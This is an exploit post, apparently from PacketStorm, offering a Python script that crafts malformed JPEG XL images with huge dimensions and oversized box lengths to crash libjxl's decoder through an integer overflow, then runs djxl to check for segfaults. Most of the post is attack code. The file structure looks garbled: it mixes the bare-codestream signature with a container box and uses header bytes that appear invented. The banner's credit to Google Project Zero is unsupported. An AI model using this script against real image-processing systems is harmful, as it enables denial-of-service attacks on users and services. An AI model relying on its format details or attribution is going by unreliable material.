Share
## https://sploitus.com/exploit?id=PACKETSTORM:217186
=============================================================================================================================================
| # Title : Libjxl Malicious Image Crafting Integer Overflow Generator |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/libjxl/libjxl/blob/main/lib/jxl/decode.cc |
=============================================================================================================================================
[+] Summary : This Python script generates malicious JPEG XL (JXL) image files designed to test a potential Integer Overflow vulnerability in libjxl.
The tool creates specially crafted JXL images with extremely large dimensions and manipulated headers that can trigger memory miscalculations when processed by vulnerable decoders.
[+] The script produces two proof-of-concept files:
poc32.jxl โ targets 32-bit systems, using image dimensions (16384ร16384) with RGBA float32 channels that theoretically require ~4 GB of memory, potentially causing integer overflow during allocation.
poc64.jxl โ targets 64-bit systems, using extremely large dimensions (2ยณยน ร 2ยณโฐ pixels) to stress size calculations inside the decoder.
The generator builds a simplified JXL structure containing:
A valid JXL signature
A jxlc codestream box with an intentionally oversized length
A manipulated image header specifying excessive width, height, and channel configuration
Random padding to simulate image data
Additionally, the script includes a testing function that attempts to decode the generated file using the djxl tool from libjxl and checks for crashes such as SIGSEGV, which may indicate successful triggering of the vulnerability.
[+] POC :
#!/usr/bin/env python3
import struct
import sys
import os
def generate_poc_32bit(filename="poc32.jxl"):
"""
Generates a JXL image to exploit the vulnerability on 32-bit systems.
Dimensions: 16384ร16384 RGBA float32 (4*4*16384*16384 = 4GB)
"""
print(f"[*] Generating {filename} for 32-bit systems...")
jxl_data = bytearray(b'\xff\x0a')
box_size = 0xFFFFFFFF
box_type = b'jxlc'
codestream = bytearray([
0x00, 0x00, 0x00, 0x0C,
0x4A, 0x58, 0x4C, 0x20,
0x00, 0x40, 0x00, 0x40,
0x04, 0x04,
0x00, 0x00,
] + bytearray(os.urandom(1024)))
with open(filename, 'wb') as f:
f.write(jxl_data)
f.write(struct.pack('<I', box_size))
f.write(box_type)
f.write(codestream)
print(f"[+] Successfully generated {filename}")
return filename
def generate_poc_64bit(filename="poc64.jxl"):
"""
Generates a JXL image to exploit the vulnerability on 64-bit systems.
Maximum dimensions: 2^31 ร 2^30 pixels
"""
print(f"[*] Generating {filename} for 64-bit systems...")
width = 0x80000000
height = 0x40000000
jxl_data = bytearray(b'\xff\x0a')
codestream = struct.pack('<II', width, height) + \
struct.pack('<BB', 4, 32) + \
bytearray(os.urandom(2048))
with open(filename, 'wb') as f:
f.write(jxl_data)
f.write(struct.pack('<I', 0xFFFFFFFF))
f.write(b'jxlc')
f.write(codestream)
print(f"[+] Successfully generated {filename}")
return filename
def test_vulnerability(jxl_file, djxl_path="./djxl"):
"""
Test the vulnerability on the target application.
"""
import subprocess
import time
print(f"[*] Testing {jxl_file} on {djxl_path}...")
try:
start = time.time()
result = subprocess.run([djxl_path, jxl_file, "--disable_output"],
capture_output=True, timeout=10)
end = time.time()
if result.returncode == -11:
print("[!] Vulnerability Confirmed: Segmentation Fault!")
return True
else:
print(f"[-] Vulnerability not exploited: {result.returncode}")
return False
except subprocess.TimeoutExpired:
print("[!] Application did not respond (maybe crash?)")
return True
except Exception as e:
print(f"[!] Error: {e}")
return False
def main():
print("="*60)
print("JXL Integer Overflow PoC Generator")
print("Google Project Zero - Vulnerability Report")
print("="*60)
poc32 = generate_poc_32bit()
poc64 = generate_poc_64bit()
print(f"\n[*] Created Files:")
print(f" - {poc32} (32-bit exploit)")
print(f" - {poc64} (64-bit exploit)")
print(f"\n[*] To Test:")
print(f" $ ./build-i686/tools/djxl {poc32} --disable_output")
print(f" $ ./djxl {poc64} --disable_output")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================